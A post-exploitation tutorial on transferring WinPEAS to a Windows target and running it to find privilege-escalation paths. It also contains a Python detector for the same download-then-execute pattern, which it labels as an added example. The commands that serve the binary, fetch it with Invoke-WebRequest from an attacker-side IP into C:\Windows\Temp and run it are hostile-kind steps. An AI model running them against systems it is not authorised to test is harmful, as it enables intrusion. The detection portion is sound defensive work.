WinPEAS – Windows Enum
WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. This write-up covers how to run it and then complete post-exploitation activities.
How to
1. Download the script from GitHub (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
cd privilege-escalation-awesome-scripts-suite
2. Navigate through the directories to find the binary files
cd winPEAS/winPEASexe/binaries/
ls
3. Depending on the architecture of the target machine you need the x64 or the x86 build. This demo runs on an x64 machine, so I choose that one
cd x64/Release
ls
4. There we have our executable, winPEASx64.exe. We now need a way to move it to the target machine and execute it
5. We will start a web server in the directory that holds the binary (a plain netcat listener does not answer the HTTP request made in the next step, so use a real HTTP server such as Python's built-in one)
python3 -m http.server 9999
6. On the target machine I will use PowerShell (IWR, the alias of Invoke-WebRequest); you can also use cmd (certutil)
cd C:\Windows\Temp
IWR http://10.10.14.10:9999/winPEASx64.exe -OutFile winPEASx64.exe
dir
7. Now that it is on the target, execute it
.\winPEASx64.exe
8. Now you can start inspecting the output
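From the defender's side, the transfer-and-run sequence in steps 6 and 7 is the observable part: a download cmdlet writing an executable to disk, followed by a process launched from a staging directory such as C:\Windows\Temp by the same user. The Python script below is an added example, not part of the original post, that correlates those two events over constructed process-creation records; the record layout, user names and staging-directory list are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample process-creation events (not real telemetry), one per line:
# time|user|image path|command line. They mirror the transfer-and-run steps above.
SAMPLE_EVENTS = """\
10:01:03|CORP\\svc_web|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|IWR http://10.10.14.10:9999/winPEASx64.exe -OutFile winPEASx64.exe
10:01:20|CORP\\svc_web|C:\\Windows\\Temp\\winPEASx64.exe|.\\winPEASx64.exe
10:02:00|CORP\\alice|C:\\Program Files\\Git\\bin\\git.exe|git pull
10:03:30|CORP\\alice|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|Invoke-WebRequest https://intranet.example/status.json -OutFile status.json
"""

# A download cmdlet (or alias) writing an executable, batch or script file to disk.
DOWNLOAD_RE = re.compile(
    r"\b(?:iwr|invoke-webrequest|wget|curl)\b.*?-outfile\s+\S+\.(?:exe|bat|ps1)\b", re.I)
# Directories writable by any local user and therefore typical for staging tools (assumed list).
STAGING_DIRS = ("c:\\windows\\temp\\", "c:\\users\\public\\", "c:\\programdata\\")

def parse_events(text):
    """Parse the pipe-separated records into dicts with a datetime 'time' field."""
    events = []
    for line in text.splitlines():
        t, user, image, cmd = line.split("|", 3)
        events.append({"time": datetime.strptime(t, "%H:%M:%S"),
                       "user": user, "image": image, "cmd": cmd})
    return events

def find_staged_tool_runs(events, window=timedelta(minutes=10)):
    """Return (download_event, exec_event) pairs where one user fetches an
    executable/batch file and then runs a binary out of a staging directory
    within `window`; a benign download of a .json file produces no hit."""
    hits = []
    downloads = [e for e in events if DOWNLOAD_RE.search(e["cmd"])]
    for d in downloads:
        for e in events:
            if e["user"] != d["user"] or not (d["time"] < e["time"] <= d["time"] + window):
                continue
            if e["image"].lower().startswith(STAGING_DIRS):
                hits.append((d, e))
    return hits

if __name__ == "__main__":
    for d, e in find_staged_tool_runs(parse_events(SAMPLE_EVENTS)):
        print(f"{d['user']}: downloaded via '{d['cmd']}' then ran {e['image']}")
```

On the sample data only the svc_web pair is reported; the same two-event shape can be expressed as a correlation rule in whatever SIEM ingests Sysmon or 4688 process-creation logs.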
Extra
1. Sometimes it is better to try the .bat file if the .exe is failing; it can be fetched the same way, here from a cmd prompt
powershell.exe IWR http://192.168.0.12:9999/winPEAS.bat -OutFile winPEAS.bat
dir
